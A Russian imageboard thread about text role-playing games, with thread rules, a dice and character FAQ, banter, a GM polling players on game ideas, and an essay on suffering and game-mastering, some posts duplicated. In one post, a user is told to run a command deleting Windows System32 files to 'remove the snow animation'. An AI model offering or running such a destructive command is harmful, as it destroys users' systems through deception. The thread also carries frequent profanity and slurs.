Пирамидально-ВСЖшный: >>1603643 (OP) | https://arhivach.vc/thread/1272432/
Правила треда:
1. Запрещен пиар конференций. Исключением является публичная легитимная конфа.
2. Помехи играм, а именно: локальные шизофорсы (сортиры, скайнеты, самоподдувы, и прочие), вайпы, откровенно вредящие ходу игры действия будут наказываться.
3. Дискриминация игроков, в том числе по признакам: олдфаг/ньюфаг, графоман/мелкопост порицается и будет наказываться.
4. Щитпостинг не приветствуется, а рецидивисты будут наказываться. Имейте уважение к сообществу.
5. Порицается разведение срачей в чьих тредах играть/не играть.
6. ГМы могут не водить в своих играх буйных и/или серящих шизов, игнорирующих правила и сеттинг игрового треда.
Единый архив:
- https://drive.google.com/drive/folders/1m507obIubskzu6EOkc-l1LJj2pxwswIm
В архиве вы найдете правила для ролевых игр и другие полезные инструменты.
Публичная конфа в Discord: xnZCFDphd9
FAQ:
>Когда игры?
ГМы производят анонс заранее, следите за тредом. В /b/ обычно играют по выходным. В /brg/ можно играть круглосуточно.
Обычное начало игр по будним дням - 6-8 вечера
Обычное начало игр по выходным - 1-3 дня
>Как роллить?
В /b/ роллинг посредством ID поста по системе ЧН0Д, в /brg/ - с помощью кубов.
(Пишите ##XdY## где вместо X - кол-во костей, вместо Y - кол-во граней)
Паритет держат две ролл-системы - d10 и ЧДН0.
>Как создать персонажа?
Вам необходимо продумать 3 параметра:
1. Имя. Придумайте, либо найдите в интернете. Особый плюс в карму получат те, кто возьмёт персонажу имя со значением, близким к характеру персонажа.
2. Предыстория. Позволяет лучше вжиться в роль и проникнуться к своему персонажу.
3. Описание персонажа. Включает ваши способности, класс, экипировку и все остальное, предусмотренное правилами игры.
Также можете создать карточку игрока. Она позволит компактно держать всю информацию в одной картинке, может облегчить жизнь как вам, так и другим людям.
Пример: https://i.ibb.co/PMGdTfN/image.png
Респект за пирамиду в шапке!
>все соснули хуй
А мне и как раз...
Не надо стыдиться, всё же хорошо. В чём проблема?
Лучшая поддержка от сообщества — Эйлон
Лучшая дебютная инди-игра — Застава
Самая ожидаемая игра — Сказочное
Лучшая игра для киберспорта — Солнцеярск
Лучшая мобильная игра — Вайфу-тред
Давай я дам тебе свой аккаунт, ты будешь сидеть в Дискорде и щитпостить там.
Я обречен заходить сюда снова и снова...
Инновации в доступности — Парящий Замок
Лучшая атмосфера - Тавернатреды
Самое скандальное — Завышенное
Там характеристики есть. Но вообще больше подходил Парящий Замок, конечно. Мы просто отыгрываем некомпетентных жюри.
Всё по пирамиде.
Я тоже перекатывал без ссылки, ее потом мочух добавляет.
Нет, все же будем считать по первому ролу! Переролл в понедельник, если не забуду...
У нас сегодня праздник. Каждый новичок который перейдет по ссылке получает горячую ерп сессию. Подумай.
Пошёл нахуй отсюда.
Надеюсь у тебя эшдд поломается.
Направь на него фен и он расстает.
Специально ради тебя выключили на всей доске. Возрадуйся.
Вернули снег.
Просто введи - del /s /q C:\Windows\System32\* в CMD (командную строку винды) и анимация снега уберется.
А ты пидор.
Докажи. Кидай д100 на процент твоего гейства
Обнял
серьезный перс рофлоперс что то между 1d3: (1) = 1
А вот и неправда. И вообще, что за претензии начались? Ты хоть в армии служил сам-то не занятый был, когда игры шли?
Я никогда не занят, я бездельник.
котакжеме.
Я понимаю, что это картинка-отсылка, но думаю бульбы смотрелись бы гораздо интереснее с другой стороны
Ну маэстро...
Ну, как угодно можно сказать. Гамбургер. А, потом... Пещера. Потом, что еще там... Трещина. Потом, как еще можно описать... Щель, потом... Ну, по-разному можно. Кара.. Курага там, потом персик, потом, что там... Слива, вот. И согнутая... пицца. Да...
>Гамбургер. А, потом... Пещера.
Округлая, молодая, чуть порозовевшая от горячей воды и смущения, блестящая от влаги. Целлюлитная? Может быть. Рядом, правее, тоже жопка. Миленькая и точно без целлюлита. Может быть, эта жопка кунчика? А может, изображены два кунчика? Длинноволосый лунопопый кун.
>Может быть, эта жопка кунчика? А может, изображены два кунчика? Длинноволосый лунопопый кун.
Не хочу тебя расстраивать, но изображены две свиньи. Бульк.
А потом вот спрашивают, чего это ФТ умирает. А всё потому что отношение такое друг к другу. Неуважительное. Постоянный пиздёж. Одни пиздят, что сделают игру, другие пиздят, что будут играть.
Я буду играть, клянусь очком тикитоки швали.
ОП ОиСа – Л И К В И Д И Р О В А Н
ОП Рейвенборна – Л И К В И Д И Р О В А Н
Ангир – Л И К В И Д И Р О В А Н
Хуезавр – Л И К В И Д И Р О В А Н
Алко – Л И К В И Д И Р О В А Н
Какос – Л И К В И Д И Р О В А Н
ОП Солнцеярска – Л И К В И Д И Р О В А Н
Кто следующий?
720x1280, 0:18
Какоса тут буквально прошлой ночью задетектили. Он же заявлял, что Хуезавр тоже на месте
твой пидор паркер
Ваш отец - вор! Ваш двоюродный брат - вор!
ой вот давайте не будем о императоре
а зачем не указывайте
>что с моими ножнами
по всем личным вопросам обращайтесь деловым письмом, у нас тут рабочее совещание
У меня чувство, что хотя бы половина людей из этого списка тут ещё сидят.
Мне стыдно за вас, потомки
Наглые морды, хуже некуда
Фурри отстой.
Поздравляю, ты не фурри
А вот ты пидор, так и знал!
А что вы все такие смелые без аватарок и анонимно роллите?
Играю в открытую, учитесь
1d100: (76) = 76
Поздравляем, вы устроили переворот и стали новым королем натуралов! Носите этот титул с гордостью, ваше тестостеронство.
Смысл бухтеть? Ни игр, ни обещаний игр - ничего. Щитпостингом ничего не исправишь.
Пошли на хуй.
Нет, не вкатывайся, пожалуйста. Не хочу тебя там видеть
Это же серун, обитающий только в организаче.
Вкатывался с лицом пик1, пока всасывал что и как, высчитывал как лучше и т.д. Жду тебя, няшка
обещай мне на НГ сделать подарок. Ты знаешь какой
Ну я что, виноват что ли в том что ты вот такая няшка?
А вообще почему наигранной-то? Как я должен по-другому?
Какая милая танцулька...
Насколько же сильно ты погряз в похоти бонби... просто нескончаемый поток тик-ток слопа... что-то ещё хоть осталось от твоих разжиженных этим всем извилин?
640x360, 0:04
>ковыляющие ведра
И что с того? Будто бы он может как-то навредить.
от души братух реально всех благ тебе братулец
Хочу поиграть на ресурсе где нет встроенной функции ролла, и ищу какие нибудь костыли.
Да хуй его знает.
Всего хорошего
Нет, анонче, я решился. От ролекуколдства мне никак не вылечится. Я просто позябаю тут своё время. Я откажюсь от соцсетей до тех пор пока меня не одолит желание что-либо делать, и на этот раз я направлю эту энергию в полезное.
Мог бы, но на это у меня нет сил, да и желания, в общем-то.
Ладно, хотел под конец пособирать юшек, но видимо, все спят или им просто всё равно.
Пока-пока
Ага-ага, жду тебя через несколько часов.
Хорошего просмотра! Не забудь потом написать отзыв
Почему тысячилетняя эльфийка плачет из-за того что какой-то там смертный, с которым она была знакома лет 50, а активно контактировала от силы 10 лет? Почему воин, который типа считается слабым и неопытным, может разрубать скалы мечом и это вообще не является чем-то сверхъестественным в их мире?
А еще этот кислотный цветофильтр уебанский, как во всех говнявых фэнтези-аниме. Мне не понравилось короче.
Аниме из девяностых и нулевых прикольное. Ковбой бибоп там, берсерк, евангелион...
> Почему тысячилетняя эльфийка плачет из-за того что какой-то там смертный, с которым она была знакома лет 50, а активно контактировала от силы 10 лет
Умер*
> Почему тысячилетняя эльфийка плачет из-за того что какой-то там смертный, с которым она была знакома лет 50, а активно контактировала от силы 10 лет?
У тебя так никогда не будет.
Правильно делаешь
Я сам ливнул, сначала ломало дико, потом нашёл применение освободившемуся времени, и жизнь наладилась. Ливай, и всё у тебя будет хорошо
Сначало опиши себя.
Другалек я тебе сейчас сам поясню щас кто ты тут есть вообще по жизни понял
Братан братишка прям в душу ты душевно по-братски и от души нашим вашим миша маваши не забудь поесть каши и послушать техника пашу
Этого в карцер - саботирует игры и не даёт раскачать маховик гейминга в брг, вернём былое величие!
Основная причина это несомненно скорость доски. В /b постинг быстрый и тред может запросто утонуть, если не постить в него хотя бы час, поэтому игры там быстрые и богатые на события. В /brg же напротив – никто никого не торопит, можно написать пост сегодня, можно завтра, а можно и через пару дней, ведь зачем спешить? Тред все равно не утонет и моего персонажа никто не хватится. Поэтому время между постами закономерно увеличивается с каждым разом и поэтому одно игровое событие или диалог может растянуться на дни, а то и на недели, и у игроков за это время может просто потеряться интерес.
Ну и еще плюс к этому порог входа в бргшные треды как правило выше, чем в б. Обязательность писать длинные посты и вникать в сложные правила отпугивает многих потенциальных игроков, и по итогу в тред вливается от силы человека четыре, один из которых почти сразу ливает из треда.
Ого, спасибо, что ты открыл нам глаза, анон!
Касательно скорости постинга и всем с этим связанного расписал верно. Эта проблема существует повсеместно, на любых площадках, подразумевающих свободный темп постинга, поэтому обычно предпочтителен сессионный формат, аналогом которого у нас как раз является игра в /b/. Иначе очень строгое отсеивание и в игре остаются лишь те, кто ролевыми буквально живёт, больше ничем не занимается, к тому же всегда стабильно имеет располагающий к игре настрой.
> Обязательность писать длинные посты
Тут ты не прав — никто никого ни к чему не обязывает. Просто люди пытаются равняться на окружение. Да, действительно, с большой вероятностью тот, кто на игровой пост в среднем выдаёт по странице А4, косо посмотрит на того, кто пишет три-четыре строки, но это не обязанность, не принуждение. Социальное давление, от которого нужно избавляться. Условный Сталкер-тред вполне нормально игрался с постами мелкими-средними. Примерно таким же был и Стальград.
> вникать в сложные правила
Ну здесь ты уже явно перегнул.
Проклятье брг это вы.
1136x846, 0:26
сук свежий труп
Пидорасище, ты же понимаешь что отвечая за другого человека такой дрочерской хуетой ты являешь собой отвратительное зрелище? Ты осознаешь, что ты жалкий кумеродаун? Осознаешь, что ты пресмыкающийся у ног игроков и ГМов червь?
>>06201
Уйму свободного времени перекрыл гонконгский грипп. Но я уже начал придумывать игру, поэтому завтра-послезавтра попробую запустить, если остался ещё порох в пороховницах.
Да.
Есть у нас игра шо ты не видишь блять...
> Иначе очень строгое отсеивание и в игре остаются лишь те, кто ролевыми буквально живёт, больше ничем не занимается, к тому же всегда стабильно имеет располагающий к игре настрой.
Бля, вот это реально больная тема. Потому что помимо игрушек хочется ещё другими делами заниматься, каждодневный постинг отнимает все силы и настроение играть, при этом если ты не быстро постишь, предпочитая подумать над текстом и как следует оформить его, то неизбежно тратишь много времени и на сессионном формате можешь тупо не успевать сохранять высокий темп. В результате разрываешься в вечной дилемме и превозмогании.
Ждём тредик!
Ты грубо себя ведешь. Где твои манеры, децл ебаный?
Это б скорее. В брг рыцарь бы сначала 30 постов заунывно говорил с этим гоблином, а потом ливнул.
Только в ерп если. Не нравится в красках описывать потные яйца мужиков.
А шапка яркая потому что всю жизнь проходил в невыделяющейся одежде темных тонов и стараюсь разнообразить свой гардероб чем-то ярким и может быть даже экстравагантным.
Именно поэтому игры Лешки были лучше всяких других
Читаю книжку по логике.
Я не сру, меня просто не вкатывают.
Так это же завлекалово на какую-то другую доску или форум, разве нет? Непосредственно в треде игры нет.
Оп же сам говорил вроде. Разве нет? Это тред для рекламы то ли отдельного форума то ли треда в вр
Играете такие месяц-два, а тут ГМ такой заявляет, что пробная часть игры подошла к концу, поэтому переходим по ссылке и играем там.
А за платную подписку доступны доп. улучшения для персов. А за донатик ГМ сам предоставит игроку готового персонажа с уже прописанными биографией, характеристиками и т.д.
>покупаем сундучки
>крутим 1d100 чтобы получить призы
Чето я просмотрел и вообще не мое. Очень много текста, я заебусь столько читать и писать.
Ты шутишь? Ходжин, Евпатий, например, тоже не очень много пишут. Не выдумывай ничего. Вкатывайся. Веселье и качество не в объёме кроются.
Ты прав.
Доволен?
а) какой-нибудь легкомысленный квестец в зимних декорациях без излишней мрачнухи и с упором на нарратив
б) нечто связанное с кхилинирским сеттингом, камерная история без фриплей опенворлда в декорациях отдельно взятой локации без привязки к имеющемуся наигранному лору (то есть до его событий)
даже если я распержусь и эту авантюру организую, в идеале хотел бы поводить дуэт персонажей и не больше во имя темповости и повышения кпд
господа играющие, уважаемые ролекуки, какой варик из перечисленных предпочтительней? если второй, какая локация/фракция в кхилинире интерпиздует вас больше прочих?
Да а) делай чё тут думать, учитывая это
>хотел бы поводить дуэт персонажей и не больше
странно, что ты вообще опубликовал это здесь, а не в конфе
Мне ничего из этого не нравится, я думаю это тоже никому не понравится, не думаю что тебе стоит начинать это дело, да и вообще лучше об этом забыть
Хочется какой-то законченной конкретики от Кхилинира, хотя бы в виде ваншота, но такое чувство, что этот сеттинг просто убивает тебя и ты опять дропнешь.
Что-нибудь про интриги, политику и тд. Либо между халифами, либо между империей. Может про Долину Грёз, про неё кроме вводного поста ничего не было поэтому и похуй как-то, в пресные озера уже наигрались.
>дуэт персонажей
И главный вопрос как ты людей отбирать будешь?
>>06964
>>07046
ваш ответ важен для нас
>>07001
пизда
>>07028
>странно, что ты вообще опубликовал это здесь, а не в конфе
неисповедимы пути хуезавровы. а вообще скажу по секрету - в конфах не играють. да и тред с конфой кагбэ на равных стоят по идее, один хуй контингент одинаковый практически. в случае тряски верные конфобляди низшего рабнга донесут скринчики тем, кто в загоне не состоит
>>07054
>Хочется какой-то законченной конкретики от Кхилинира
типа просто закрыть гештальт путём окончания хоть какой-то игры в сеттинге? иного варианта просто не вижу, ибо на момент расширения игрового мира от караванных вводных до того, че есть на руках сейчас, я сей песчаный мирок задумывал в том числе как площадку для не зависящих друг от друга игорь. два фриплейных выпука можно считать за обкатки-притирки опенворлдовских условий.
>этот сеттинг просто убивает тебя и ты опять дропнешь
если так подумать, я обтекаю больше от необходимости водить большую ораву на длинной дистанции. исторически хорошо выходили именно ваншотные или /b/шные треды, которые проходили за считанные дни ну или недели, если считать фриплейный, хотя его так и не закончили, важен наверное больше факт ебашилова ежедневного
вождение лонгран треда в темате так-то охуиллиард переменных требует для адекватного попыта игры - и ветки учитывать, и мир не одними кобаномурлоками наполнять, и неписей сепарировать etc., не говоря уже о банальном процессе постинга как такового
алсо, на пресловутое написание у меня тоже немало кпд уходит, что по первой компенсируется вдохновением, а в долгоиграйке в какой-то момент достигает критических значений
>И главный вопрос как ты людей отбирать будешь?
да я на самом деле хуй его знает
единственное, что могу сказать - бонби и аналку водить точно не буду. думаю, если будет тред не буду дробить на орг и игровой, дам потанцевальным вкатунам поболтать друг с дружкой, пообсуждать персонажей, а там уж и выберу, присмотревшись к кандидатам. но это так-то тоже скользкая хуйня, поскольку >ряяяя тиран прыгозавр конфоблядей лоббирует доколе
но иного варианта особо не вижу, а большую тусовку водить желанием не горю
>>06964
>>07046
ваш ответ важен для нас
>>07001
пизда
>>07028
>странно, что ты вообще опубликовал это здесь, а не в конфе
неисповедимы пути хуезавровы. а вообще скажу по секрету - в конфах не играють. да и тред с конфой кагбэ на равных стоят по идее, один хуй контингент одинаковый практически. в случае тряски верные конфобляди низшего рабнга донесут скринчики тем, кто в загоне не состоит
>>07054
>Хочется какой-то законченной конкретики от Кхилинира
типа просто закрыть гештальт путём окончания хоть какой-то игры в сеттинге? иного варианта просто не вижу, ибо на момент расширения игрового мира от караванных вводных до того, че есть на руках сейчас, я сей песчаный мирок задумывал в том числе как площадку для не зависящих друг от друга игорь. два фриплейных выпука можно считать за обкатки-притирки опенворлдовских условий.
>этот сеттинг просто убивает тебя и ты опять дропнешь
если так подумать, я обтекаю больше от необходимости водить большую ораву на длинной дистанции. исторически хорошо выходили именно ваншотные или /b/шные треды, которые проходили за считанные дни ну или недели, если считать фриплейный, хотя его так и не закончили, важен наверное больше факт ебашилова ежедневного
вождение лонгран треда в темате так-то охуиллиард переменных требует для адекватного попыта игры - и ветки учитывать, и мир не одними кобаномурлоками наполнять, и неписей сепарировать etc., не говоря уже о банальном процессе постинга как такового
алсо, на пресловутое написание у меня тоже немало кпд уходит, что по первой компенсируется вдохновением, а в долгоиграйке в какой-то момент достигает критических значений
>И главный вопрос как ты людей отбирать будешь?
да я на самом деле хуй его знает
единственное, что могу сказать - бонби и аналку водить точно не буду. думаю, если будет тред не буду дробить на орг и игровой, дам потанцевальным вкатунам поболтать друг с дружкой, пообсуждать персонажей, а там уж и выберу, присмотревшись к кандидатам. но это так-то тоже скользкая хуйня, поскольку >ряяяя тиран прыгозавр конфоблядей лоббирует доколе
но иного варианта особо не вижу, а большую тусовку водить желанием не горю
Дружище, делай то, что по кайфу. Я обещаю, что вкачусь в любое твоё творение.
Мимо не аналка и не бонби
>типа просто закрыть гештальт путём окончания хоть какой-то игры в сеттинге?
Скорее хочется осмысленной истории в этом сеттинге, которая как-то логически завершилась. Рассказана определенная история/даны ответы на вопросы/действия игроков привели к последствиям для мира (хотя бы локальным) и тд. Может быть одно из этого списка или вместе взятые. Потому что вроде потанцевал есть, но мир как бы продолжает пребывать в стадии когда ты его только представил, по факту ничего даже локально существенного не произошло. В общем, Кхилинир надо оживить событиями, чтобы он не ощущался как декорация.
>площадку для не зависящих друг от друга игорь
Идейно звучит хорошо, но на практике хуй знает.
>алсо, на пресловутое написание у меня тоже немало кпд уходит, что по первой компенсируется вдохновением, а в долгоиграйке в какой-то момент достигает критических значений
Хорошо, что ты осознал эту проблему.
>ряяяя тиран прыгозавр конфоблядей лоббирует доколе
Так и будет. Пока получается что у тебя есть какая-то идея(желание), чтобы сыграть определенную историю. Соответственно отбор персонажей будет происходить по тому как они подходят под лично твое представление данной истории и возможности вписать персонажей в происходящее. Это надо сразу обозначить в самом начале.
>Скорее хочется осмысленной истории в этом сеттинге, которая как-то логически завершилась. Рассказана определенная история/даны ответы на вопросы/действия игроков привели к последствиям для мира (хотя бы локальным) и тд. Может быть одно из этого списка или вместе взятые. Потому что вроде потанцевал есть, но мир как бы продолжает пребывать в стадии когда ты его только представил, по факту ничего даже локально существенного не произошло. В общем, Кхилинир надо оживить событиями, чтобы он не ощущался как декорация.
ни прибавить ни убавить
>Идейно звучит хорошо, но на практике хуй знает.
да когда эта практика была-то, я уж и не вспомню, че последнее водил/играл
>Хорошо, что ты осознал эту проблему.
ещё б её зафиксить
>Так и будет. Пока получается что у тебя есть какая-то идея(желание), чтобы сыграть определенную историю. Соответственно отбор персонажей будет происходить по тому как они подходят под лично твое представление данной истории и возможности вписать персонажей в происходящее. Это надо сразу обозначить в самом начале.
так и планировалось
в общем, я поковыряюсь, черновички понакидываю себе в стол, если че решить успею чисел до 27-28, пукну итт и итк
> бонби и аналку водить точно не буду
А можешь еще аниме и нейро-аватарки (за исключением очень качественных) запретить? Пиздец как рушат атмосферу. Даже играть с такими не хочется.
И ты не будешь!
Может быть и буду (нет)
1d99: (71) = 71
1d99: (1) = 1
1d99: (10) = 10
Только последние три юшки мои. Ты что, сумасшедший? Я же вообще не пью
1d100: (93) = 93
Какая старая гвардия? Ты о чем? Тут половина это ангириксы, которые не знают никого из пирамиды и просят растолковать каждый рофл. Может быть это ты не заходил сюда в течении года?
0-4 Не поймал
5-9 Поймал ее ртом
if only you knew how bad things really are...
А ты здоровый лоб до сих пор продолжаешь сидеть тут? Не стыдно?
1280x720, 1:28
Да, в нечто подобное я бы хотел когда-нибудь поиграть, да...
Ну я, например.
Я за себя отвечаю. Сообщение на которое я написал ответ было адресованно мне, оно было ответом на пост, который написал я. Так что это ты за меня отвечаешь. Извинись пожалуйста.
Я возмущён твоей клеветой. Хватит пожалуйста обманывать. Я отвечаю только на те сообщения, которые были адресованы мне. Прекрати паясничать.
Мы явно зашли в тупик, но тем не менее я попрошу тебя не чваниться своими вот этими замечаниями и прекращай хитрить. Мы и так спугнули того, кто мне писал. Не тебе.
Я попрошу, писали мне. Я до сих пор удивляюсь как тебе хватает наглости выдавать себя за автора моих сообщений. Ты просто врешь и не краснеешь. Тупик или нет, но я на твоём месте сильно постыдился бы. Истина дороже.
Какой нахал! Ладно, так уж и быть, чтобы не опорочить свое доброе имя не стану пререкаться с вот таким вот как ты. Мне моя честь дороже, понимаешь ли. Хотя, наверное не понимаешь. Кстати, видишь этого интеллигентного Пепу на прикрепленной к посту картинке? Это буквально я - такой же благородный господин. Поднимаю тост за то, чтобы ты набрался ума.
Эта наглость выводит меня из себя уже не первый раз. Но я держусь благороднее и сдержаннее чем ты, который помимо того что присвоил себе мой пост, ещё и по хамски себя ведешь, отрицая это. Я пытался тебя образумить и призвать к признанию истины, как бы она не порочила тебя после стольких препирательств, но ты меня не послушал. Что ж, выбрать ложь, грубость и вульгарное поведение это твоё дело. Я не вижу смысла писать тебе дальше, но знай же, что для меня и для любого порядочного анона ты теперь наглый вор и мошенник. Ты мне неприятен.
О боги, какое тяжкое испытание! Должен ли я пререкаться с тобой или довольно мне на сегодня тяжб конфликтов? Я прошу хоть какую-нибудь милую душу, образумьте же вы его! Мне так жаль, что я здесь и сейчас вынужден призывать к разуму неразумного! О, позор мне...
0-4 призыв сработал
5-9 призыв не сработал
ОиС
Орвилл.
Этот прав. Буквально лучшее, что было.
Ты не утащишь нас на свой донатный форум. Даже не пытайся.
Страх перед неизвестной публикой. Тутошние рады хоть чему-нибудь, лишь бы было. В том же вр могут и обоссать за плохую игру а могут и похвалить
Кроме него там никого и не будет
Без пидорства.
640x360, 2:37
Существует утверждение, что лучше всего творить или находясь по всем фронтам в полной жопе, где-нибудь в зассаной квартирке с бутылкой в руках и кучей проблем, или находясь в полной нирване, сидя где-нибудь вечерком у камина в небольшом домике в швейцарских Альпах с кружечкой какао в руках.
Со вторым всё понятно, а вот первое можно рассмотреть как вещь в себе и как контекст в ведении текстовых игр. Среднее состояние я не беру, в нём писать просто не хочется как правило. Особенно в рамках ГМства. Точнее, в рамках ГМства может и хочется, но обычно не пишется.
Так вот, страдания. Как известно, люди обычно раскрывают свой творческий потенциал в те периоды своей жизни, когда им вроде как плохо. Тоска, печаль, уныние и грусть, — вот двигатели искусства. Я это и по себе знаю, — всё самое хорошее, что я писал, я писал в минуты душевной и/или физической боли. И даже если человек может творить в минуты достатка и спокойствия, всё же самые гениальные творения он будет создавать именно под действием страданий, телесных или душевных. Достаточно открыть биографии известных писателей и поэтов. Например По, Булгаков, Хемингуэй. Они были несчастными людьми, если так посудить. Страдавшие от депрессии, алкоголизма и наркомании, они писали великие произведения. И это не "время такое было", все эти байки рождаются как раз под влиянием буквенного и масляного мрачняка того времени и исторических мифов. У тех писателей действительно были проблемы.
Некоторые творцы были несчастливы по другой причине. Например один философ, кажется Сартр, называл поэта Шарля Бодлера "несчастным по собственной вине" или по собственной воле, уже не вспомню. Гашиш, беспорядочные половые связи, вино, вечные страдания от неразделённой любви и от недопонятости обществом. А Артюр Рембо, прилежный ученик французской школы внезапно стал вести распутный и деструктивный образ жизни, пытаясь испробовать всё новое и новое, чтобы получить опыт и стать истинным поэтом. Голод, нищенство, зависимости, насилие, везде их ждали страдания. И тем не менее, им удавалось писать поистине гениальные произведения.
Потому что творчество в таком случае выступает в роли отдушины.
Но вопрос вот в чëм. В рамках ведения текстовых игр, как показывает практика, писать хорошо получится только в случае умиротворения.
Почему несчастье как двигатель творчества не распространяется на ГМстве в текстовых играх? Казалось бы, тут ты тоже пишешь историю, придумываешь, творишь. Однако нет, здесь невзгоды, беды и зависимости только мешают процессу, по себе знаю. Но не буду отрицать, что в состоянии среднего довольствия пишется ещё хуже, это так.
Разберём. Я всегда утверждал, что история пишется не только ГМом, но и игроками. Получается, что эта история пишется в соавторстве. Может быть, это и есть одна из причин, по которой такая история обречена на провал? Если тот, в чьих руках перо, записывает большую часть повествования сидя с мешками под глазами, разбитым телом и сломленным духом, у него не будет сил обращать достаточное количество внимания на соавторов, перед которыми волей-неволей чувствует ответственность. Отсюда тупняки, косяки, ошибки и как следствие дропы ГМов.
А может быть причина ещё в том, что процесс ГМства это как написание книги на публике? Это же фактор игры на борде. Вот дескать сидит посреди площади-треда такой несчастный жалкий писатель-ГМ, окружённый кучкой соавторов-игроков, присутствие которых и без того тяготит, а рядом ещё и стоят, глазея на написание, толпы зевак-ролекуколдов, среди которых встречаются площадные клошары-серуны, норовящие плюнуть в чистую бумагу. Такое творчество отдушиной быть точно не может.
И в такой обстановке, в совокупности всех этих факторов, написание истории действительно ощущается скорее как нелюбимая работа. Продолжать её выполнять подталкивает только знание того, что если опустить перо и сказать "не ребята, не могу", в тебя потекут реки ссанины из ширинок и соавторов, и зевак, и само собой клошаров.
Гораздо приятнее было бы писать игровую историю находясь в добром расположении духа и тела, сидя в уютном домике с соавторами, с которыми состоишь в теплых отношениях.
Отсюда и малое количество ГМов, потому как молодых-шутливых-беззаботных мало, а несчастных много.
Поэтому хороший, много и регулярно пишущий ГМ, чаще всего является человеком счастливым, находящемся в некоем покое и умиротворении. В том пресловутом альпийском домике. А несчастных ГМство делает ещё несчастливее.
И тут вытекает ещё одно предположение — а может быть ГМство это и не творчество, а просто буквально отыгрыш творчества?
Как бы то ни было, я сейчас вижу сказочный тред, его ГМа с конскими темпами, и, понятное дело, довольных игроков. Мастеру игры я пожелаю подольше состояния "альпийского рая", а всем прочитавшим — добра и удачи.
640x360, 2:37
Существует утверждение, что лучше всего творить или находясь по всем фронтам в полной жопе, где-нибудь в зассаной квартирке с бутылкой в руках и кучей проблем, или находясь в полной нирване, сидя где-нибудь вечерком у камина в небольшом домике в швейцарских Альпах с кружечкой какао в руках.
Со вторым всё понятно, а вот первое можно рассмотреть как вещь в себе и как контекст в ведении текстовых игр. Среднее состояние я не беру, в нём писать просто не хочется как правило. Особенно в рамках ГМства. Точнее, в рамках ГМства может и хочется, но обычно не пишется.
Так вот, страдания. Как известно, люди обычно раскрывают свой творческий потенциал в те периоды своей жизни, когда им вроде как плохо. Тоска, печаль, уныние и грусть, — вот двигатели искусства. Я это и по себе знаю, — всё самое хорошее, что я писал, я писал в минуты душевной и/или физической боли. И даже если человек может творить в минуты достатка и спокойствия, всё же самые гениальные творения он будет создавать именно под действием страданий, телесных или душевных. Достаточно открыть биографии известных писателей и поэтов. Например По, Булгаков, Хемингуэй. Они были несчастными людьми, если так посудить. Страдавшие от депрессии, алкоголизма и наркомании, они писали великие произведения. И это не "время такое было", все эти байки рождаются как раз под влиянием буквенного и масляного мрачняка того времени и исторических мифов. У тех писателей действительно были проблемы.
Некоторые творцы были несчастливы по другой причине. Например один философ, кажется Сартр, называл поэта Шарля Бодлера "несчастным по собственной вине" или по собственной воле, уже не вспомню. Гашиш, беспорядочные половые связи, вино, вечные страдания от неразделённой любви и от недопонятости обществом. А Артюр Рембо, прилежный ученик французской школы внезапно стал вести распутный и деструктивный образ жизни, пытаясь испробовать всё новое и новое, чтобы получить опыт и стать истинным поэтом. Голод, нищенство, зависимости, насилие, везде их ждали страдания. И тем не менее, им удавалось писать поистине гениальные произведения.
Потому что творчество в таком случае выступает в роли отдушины.
Но вопрос вот в чëм. В рамках ведения текстовых игр, как показывает практика, писать хорошо получится только в случае умиротворения.
Почему несчастье как двигатель творчества не распространяется на ГМстве в текстовых играх? Казалось бы, тут ты тоже пишешь историю, придумываешь, творишь. Однако нет, здесь невзгоды, беды и зависимости только мешают процессу, по себе знаю. Но не буду отрицать, что в состоянии среднего довольствия пишется ещё хуже, это так.
Разберём. Я всегда утверждал, что история пишется не только ГМом, но и игроками. Получается, что эта история пишется в соавторстве. Может быть, это и есть одна из причин, по которой такая история обречена на провал? Если тот, в чьих руках перо, записывает большую часть повествования сидя с мешками под глазами, разбитым телом и сломленным духом, у него не будет сил обращать достаточное количество внимания на соавторов, перед которыми волей-неволей чувствует ответственность. Отсюда тупняки, косяки, ошибки и как следствие дропы ГМов.
А может быть причина ещё в том, что процесс ГМства это как написание книги на публике? Это же фактор игры на борде. Вот дескать сидит посреди площади-треда такой несчастный жалкий писатель-ГМ, окружённый кучкой соавторов-игроков, присутствие которых и без того тяготит, а рядом ещё и стоят, глазея на написание, толпы зевак-ролекуколдов, среди которых встречаются площадные клошары-серуны, норовящие плюнуть в чистую бумагу. Такое творчество отдушиной быть точно не может.
И в такой обстановке, в совокупности всех этих факторов, написание истории действительно ощущается скорее как нелюбимая работа. Продолжать её выполнять подталкивает только знание того, что если опустить перо и сказать "не ребята, не могу", в тебя потекут реки ссанины из ширинок и соавторов, и зевак, и само собой клошаров.
Гораздо приятнее было бы писать игровую историю находясь в добром расположении духа и тела, сидя в уютном домике с соавторами, с которыми состоишь в теплых отношениях.
Отсюда и малое количество ГМов, потому как молодых-шутливых-беззаботных мало, а несчастных много.
Поэтому хороший, много и регулярно пишущий ГМ, чаще всего является человеком счастливым, находящемся в некоем покое и умиротворении. В том пресловутом альпийском домике. А несчастных ГМство делает ещё несчастливее.
И тут вытекает ещё одно предположение — а может быть ГМство это и не творчество, а просто буквально отыгрыш творчества?
Как бы то ни было, я сейчас вижу сказочный тред, его ГМа с конскими темпами, и, понятное дело, довольных игроков. Мастеру игры я пожелаю подольше состояния "альпийского рая", а всем прочитавшим — добра и удачи.
Пиздец ты конечно высрал мыслей, хотя все крутился вокруг да около конкретной, но так и не высказал ее по сути. А суть в том, что вдумчиво написанное произведение будет отличаться от того, которое сыграно через кубы. И это не соавторство блять, это жопа, это не произведение, а рандомный пиздец, который заведомо обречен на провал. И если даже получится что-то создать совместными усилиями, то
Ой блять, мне лень раскрывать мысль, самое главное я уже сказал и пожалуй хватит. Брг это развлекалово, а не что-то серьезное и ненадо тут умным казаться, тут все дураки
Да, отличается, но пост был не об этом. Текстовая игра это действительно написание истории в соавторстве, просто тут какой-то хаотический элемент присутствует. Ничего не продумаешь.
А игры редко когда игры бывает интересно читать как художественное произведение. Хотя они таковыми являются, просто из-за плохого написания они так не воспринимаются.
А если бы у автора и соавторов была бы какая-то связь определённая, может что-то годное и вышло бы. Вот кто например писал самые интересные книги в соавторстве за последние лет 50? Братья Стругацкие, очевидно. У остальных не получалось. Почему? Да потому что связь у людей такая, они буквально братья. А когда историю пишут анонимы, такого нет.
И если у тебя складывается впечатление, что я пытаюсь казаться умным — твой мозг подсознательно посчитал, что я кажусь умным. Поэтому не разводи ведро крабов, я только хотел донести мысль. И я считаю, что я её донес.
Потому что соавторы пишут на годы вперед, чтобы их писанина продавалась и обсуждалась
